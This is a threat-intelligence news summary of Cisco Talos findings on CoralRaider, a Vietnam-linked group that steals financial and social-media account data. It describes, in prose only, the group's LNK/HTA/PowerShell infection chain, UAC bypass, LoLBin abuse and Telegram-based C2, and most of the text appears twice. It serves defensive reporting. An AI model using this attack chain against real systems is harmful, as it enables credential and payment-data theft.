Cisco Talos reports the discovery of a new financially motivated attacker, CoralRaider, which has been active since at least May 2023, targeting victims in India, China, South Korea, Bangladesh, Pakistan, Indonesia and Vietnam.
The group is engaged in the theft of accounting and financial data, advertising and business accounts on social networks using malware: RotBot and the stealer XClient.
Other payloads used by the group include a combination of remote access Trojans and information stealers: AsyncRAT, NetSupport RAT and Rhadamanthys.
The actor uses a deadlock technique by abusing a legitimate service to host a C2 configuration file and unusual LoLBins binaries, including Windows Forfiles.exe and FoDHelper.exe.
The analysis showed that the attacker uses a Telegram bot as a C2 to steal victim data from victims’ computers, which is then sold on the darknet and specialized groups on Telegram.
The attack chains begin with a Windows shortcut (LNK) file, although there is currently no clear explanation for how these files are distributed to targets.
If the LNK file is opened, an HTML application (HTA) file is downloaded and executed from an attacker-controlled download server, which in turn runs an embedded Visual Basic script.
The script decrypts and sequentially executes three other PowerShell scripts that are responsible for performing checks, bypassing Windows (UAC), disabling notifications and applications, and downloading and launching RotBot.
RotBot is a variant of the Quasar RAT client that the attacker configured and compiled for this campaign.
It is configured to communicate with the Telegram bot, deliver XClient and execute it in memory, ultimately stealing cookies, credentials and financial information from Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox and Opera browsers, as well as Discord data and Telegram.
XClient is also capable of extracting detailed payment method information from victims' Facebook, Instagram, TikTok and YouTube accounts, including those associated with businesses and advertising accounts.
Based on Telegram analytics, language preferences, and IP sightings (in Hanoi), Cisco Talos researchers believe with a high degree of confidence that CoralRaiders are based in Vietnam.
Additional technical details of the attack chain of the uncovered campaign can also be found in the QiAnXin Threat Intelligence Center report.
The group is engaged in the theft of accounting and financial data, advertising and business accounts on social networks using malware: RotBot and the stealer XClient.
Other payloads used by the group include a combination of remote access Trojans and information stealers: AsyncRAT, NetSupport RAT and Rhadamanthys.
The actor uses a deadlock technique by abusing a legitimate service to host a C2 configuration file and unusual LoLBins binaries, including Windows Forfiles.exe and FoDHelper.exe.
The analysis showed that the attacker uses a Telegram bot as a C2 to steal victim data from victims’ computers, which is then sold on the darknet and specialized groups on Telegram.
The attack chains begin with a Windows shortcut (LNK) file, although there is currently no clear explanation for how these files are distributed to targets.
If the LNK file is opened, an HTML application (HTA) file is downloaded and executed from an attacker-controlled download server, which in turn runs an embedded Visual Basic script.
The script decrypts and sequentially executes three other PowerShell scripts that are responsible for performing checks, bypassing Windows (UAC), disabling notifications and applications, and downloading and launching RotBot.
RotBot is a variant of the Quasar RAT client that the attacker configured and compiled for this campaign.
It is configured to communicate with the Telegram bot, deliver XClient and execute it in memory, ultimately stealing cookies, credentials and financial information from Brave, Cốc Cốc, Google Chrome, Microsoft Edge, Mozilla Firefox and Opera browsers, as well as Discord data and Telegram.
XClient is also capable of extracting detailed payment method information from victims' Facebook, Instagram, TikTok and YouTube accounts, including those associated with businesses and advertising accounts.
Based on Telegram analytics, language preferences, and IP sightings (in Hanoi), Cisco Talos researchers believe with a high degree of confidence that CoralRaiders are based in Vietnam.
Additional technical details of the attack chain of the uncovered campaign can also be found in the QiAnXin Threat Intelligence Center report.
